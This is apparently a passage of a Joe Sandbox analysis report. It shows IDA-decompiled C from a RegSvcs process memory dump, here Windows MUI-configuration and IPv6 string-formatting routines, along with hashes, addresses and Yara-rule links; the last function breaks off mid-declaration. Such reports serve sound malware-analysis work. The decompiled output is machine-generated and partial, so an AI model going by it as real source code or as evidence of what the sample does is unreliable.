                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FE24 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FFFC Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FF34 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00888788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00888788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00888460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0086E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0088718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00888460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0088718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00888460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00888460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00888460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0088718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0086E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00862340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0087E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0086E2A8(_t322,  &_v68, _v16);
								if(E00885553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0087E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0086E2A8(_t322,  &_v68, _t236);
								if(E00885553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0088718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0086E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00862340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0087E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0086E2A8(_v12,  &_v68, _v16);
							if(E00885553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0087E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0086E2A8(_t322,  &_v68, _t269);
							if(E00885553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0088718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0086E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00862340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0087E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0086E2A8(_v12,  &_v68, _v16);
						if(E00885553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0087E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0086E2A8(_t322,  &_v68, _t296);
						if(E00885553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                0x00888788
                                                0x00888788
                                                0x00888791
                                                0x00888794
                                                0x00888798
                                                0x0088879b
                                                0x0088879e
                                                0x008887a1
                                                0x008887a4
                                                0x008887a7
                                                0x008887aa
                                                0x008887af
                                                0x008d1ad3
                                                0x00888b0a
                                                0x00888b0d
                                                0x00888b13
                                                0x00888b19
                                                0x00888b1f
                                                0x00888b25
                                                0x00888b2b
                                                0x00888b31
                                                0x00888b37
                                                0x00888b3d
                                                0x00888b46
                                                0x00888b46
                                                0x008887c6
                                                0x008887d0
                                                0x008d1ae0
                                                0x008d1ae6
                                                0x008d1af8
                                                0x008d1af8
                                                0x008d1afd
                                                0x008d1afe
                                                0x008d1b01
                                                0x008d1b06
                                                0x008d1b06
                                                0x008887d6
                                                0x008887f2
                                                0x008887f7
                                                0x00888807
                                                0x0088880a
                                                0x0088880f
                                                0x00888810
                                                0x00888813
                                                0x00888818
                                                0x00888818
                                                0x0088882c
                                                0x00888831
                                                0x00888838
                                                0x00888908
                                                0x00888920
                                                0x008889f0
                                                0x00888a08
                                                0x00888af6
                                                0x00888af6
                                                0x00888af8
                                                0x00888afb
                                                0x008d1beb
                                                0x008d1beb
                                                0x00888b04
                                                0x008d1bf8
                                                0x008d1c0e
                                                0x008d1c13
                                                0x008d1c16
                                                0x008d1c16
                                                0x008d1bf8
                                                0x00000000
                                                0x00888b04
                                                0x00888a0e
                                                0x00888a11
                                                0x00888a14
                                                0x00888a15
                                                0x00888a18
                                                0x00888a22
                                                0x00888b59
                                                0x00888a28
                                                0x00888a3c
                                                0x00888a3c
                                                0x00888a42
                                                0x008d1bb0
                                                0x008d1b11
                                                0x008d1b11
                                                0x00000000
                                                0x00888a48
                                                0x00888a51
                                                0x00888a5b
                                                0x00888a5e
                                                0x00888a61
                                                0x00888a69
                                                0x00888a69
                                                0x00888a6d
                                                0x00000000
                                                0x00000000
                                                0x00888a74
                                                0x00888a7c
                                                0x00888a7d
                                                0x00888a91
                                                0x00888a93
                                                0x00888a93
                                                0x00888a98
                                                0x00888a9b
                                                0x00888aa1
                                                0x00888aa1
                                                0x00888aa4
                                                0x00888aaa
                                                0x00888ab1
                                                0x00888ac5
                                                0x00888ac7
                                                0x00888ac7
                                                0x00888ac5
                                                0x00888ace
                                                0x008d1bc9
                                                0x008d1bce
                                                0x008d1bd2
                                                0x008d1bd2
                                                0x00888ad8
                                                0x00888aeb
                                                0x00888aeb
                                                0x00888af0
                                                0x00888af4
                                                0x00000000
                                                0x00888af4
                                                0x00888a42
                                                0x00888926
                                                0x00888929
                                                0x0088892c
                                                0x0088892d
                                                0x00888930
                                                0x00888935
                                                0x0088893a
                                                0x00888b51
                                                0x00888940
                                                0x00888954
                                                0x00888954
                                                0x0088895a
                                                0x008d1b63
                                                0x00000000
                                                0x00888960
                                                0x00888969
                                                0x00888973
                                                0x00888976
                                                0x00888979
                                                0x0088897e
                                                0x00888981
                                                0x00888981
                                                0x00888986
                                                0x00000000
                                                0x00000000
                                                0x008d1b6e
                                                0x008d1b74
                                                0x008d1b7b
                                                0x008d1b8f
                                                0x008d1b91
                                                0x008d1b91
                                                0x008d1b99
                                                0x008d1b9c
                                                0x008d1ba2
                                                0x008d1ba2
                                                0x0088898c
                                                0x00888992
                                                0x00888999
                                                0x008889ad
                                                0x008d1ba8
                                                0x008d1ba8
                                                0x008889ad
                                                0x008889b6
                                                0x008889c8
                                                0x008889cd
                                                0x008889d0
                                                0x008889d0
                                                0x008889d6
                                                0x008889e8
                                                0x008889e8
                                                0x008889ed
                                                0x00000000
                                                0x008889ed
                                                0x0088895a
                                                0x0088883e
                                                0x00888841
                                                0x00888844
                                                0x00888845
                                                0x00888848
                                                0x0088884d
                                                0x00888852
                                                0x00888b49
                                                0x00888858
                                                0x0088886c
                                                0x0088886c
                                                0x00888872
                                                0x008d1b0e
                                                0x00000000
                                                0x00888878
                                                0x00888881
                                                0x0088888b
                                                0x0088888e
                                                0x00888891
                                                0x00888896
                                                0x00888899
                                                0x00888899
                                                0x0088889e
                                                0x00000000
                                                0x00000000
                                                0x008d1b21
                                                0x008d1b27
                                                0x008d1b2e
                                                0x008d1b42
                                                0x008d1b44
                                                0x008d1b44
                                                0x008d1b4c
                                                0x008d1b4f
                                                0x008d1b55
                                                0x008d1b55
                                                0x008888a4
                                                0x008888aa
                                                0x008888b1
                                                0x008888c5
                                                0x008d1b5b
                                                0x008d1b5b
                                                0x008888c5
                                                0x008888ce
                                                0x008888e0
                                                0x008888e5
                                                0x008888e8
                                                0x008888e8
                                                0x008888ee
                                                0x00888900
                                                0x00888900
                                                0x00888905
                                                0x00000000
                                                0x00888905

                                                APIs
                                                Strings
                                                • WindowsExcludedProcs, xrefs: 008887C1
                                                • Kernel-MUI-Language-SKU, xrefs: 008889FC
                                                • Kernel-MUI-Number-Allowed, xrefs: 008887E6
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00888914
                                                • Kernel-MUI-Language-Allowed, xrefs: 00888827
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: 4edefa3331bccce3174db55b66fdb60262bb28b6008e48f1faa7591f49128b23
                                                • Instruction ID: 70d85cbc0ef58c11514611eed98c6548fc392ea83c2fb1751cabb40f5db0d175
                                                • Opcode Fuzzy Hash: 4edefa3331bccce3174db55b66fdb60262bb28b6008e48f1faa7591f49128b23
                                                • Instruction Fuzzy Hash: C4F107B6D00209EFCF11EF98C9859EEBBB8FF08304F55446AE505E7211EB349A45DB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008A13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 38%
                                                			E008A13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00897707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x862926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00897707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x869cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00897707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00897707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00897707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00897707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                0x008a13d5
                                                0x008a13d9
                                                0x008a13dc
                                                0x008a13de
                                                0x008a13e1
                                                0x008a13e8
                                                0x008a13ee
                                                0x008ce8fd
                                                0x00000000
                                                0x008ce921
                                                0x008ce921
                                                0x008ce928
                                                0x008ce982
                                                0x008ce98a
                                                0x00000000
                                                0x008ce99a
                                                0x008ce99e
                                                0x008ce9a3
                                                0x008ce9a8
                                                0x008ce9b9
                                                0x008ce978
                                                0x00000000
                                                0x008ce978
                                                0x008ce98a
                                                0x008ce92a
                                                0x008ce931
                                                0x008ce944
                                                0x008ce944
                                                0x008ce950
                                                0x008ce954
                                                0x008ce959
                                                0x008ce95e
                                                0x008ce963
                                                0x008ce970
                                                0x00000000
                                                0x008ce975
                                                0x008ce93b
                                                0x008ce980
                                                0x00000000
                                                0x008ce980
                                                0x008ce942
                                                0x008ce94b
                                                0x00000000
                                                0x008ce94b
                                                0x00000000
                                                0x008ce942
                                                0x008a13f4
                                                0x008a13f4
                                                0x008a13f9
                                                0x008a13fc
                                                0x008a13ff
                                                0x008a1406
                                                0x008ce9cc
                                                0x008ce9d2
                                                0x008ce9d2
                                                0x008ce9cc
                                                0x008a140c
                                                0x008a1411
                                                0x008a1431
                                                0x008a143a
                                                0x008a143c
                                                0x008a143f
                                                0x008a143f
                                                0x008a1442
                                                0x008a1447
                                                0x008a14a8
                                                0x008a14ac
                                                0x008ce9e2
                                                0x008ce9e7
                                                0x008ce9ec
                                                0x008cea05
                                                0x008cea05
                                                0x00000000
                                                0x008a1449
                                                0x00000000
                                                0x008a1449
                                                0x008a144c
                                                0x008a1459
                                                0x008a1462
                                                0x008a1469
                                                0x008a146a
                                                0x008a1470
                                                0x008a1473
                                                0x008a1476
                                                0x008a1476
                                                0x008a1490
                                                0x008a1495
                                                0x008a138e
                                                0x008a1390
                                                0x008a1397
                                                0x008a1398
                                                0x008a1399
                                                0x008a13a1
                                                0x008a13a4
                                                0x008a13a4
                                                0x008a1498
                                                0x008a149c
                                                0x008a149f
                                                0x008a14a2
                                                0x00000000
                                                0x00000000
                                                0x008a14a4
                                                0x00000000
                                                0x008a14a4
                                                0x008a1413
                                                0x008a1415
                                                0x008a1416
                                                0x008a1419
                                                0x008a141c
                                                0x008a1422
                                                0x008a13b7
                                                0x008a13bc
                                                0x008a13bf
                                                0x008a13bf
                                                0x008a13c2
                                                0x008a1424
                                                0x008a1424
                                                0x008a1424
                                                0x008a1427
                                                0x008a142b
                                                0x008a142c
                                                0x008a142c
                                                0x008a142c
                                                0x00000000
                                                0x008a141c
                                                0x008a1411

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 63d466d6b2867ee6a37c342849f389f37aebfac8de9b743c3109e2ce88eb23b4
                                                • Instruction ID: 90fe10c7d3d4450449a81cc4e7d0318fe880d573ab505f3de22f70b93a69ba56
                                                • Opcode Fuzzy Hash: 63d466d6b2867ee6a37c342849f389f37aebfac8de9b743c3109e2ce88eb23b4
                                                • Instruction Fuzzy Hash: 59613671914655BADF24DF9DC8848BEBBB6FF99300B18C02DE4D6C7A40D278AA40CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00897EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E00897EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
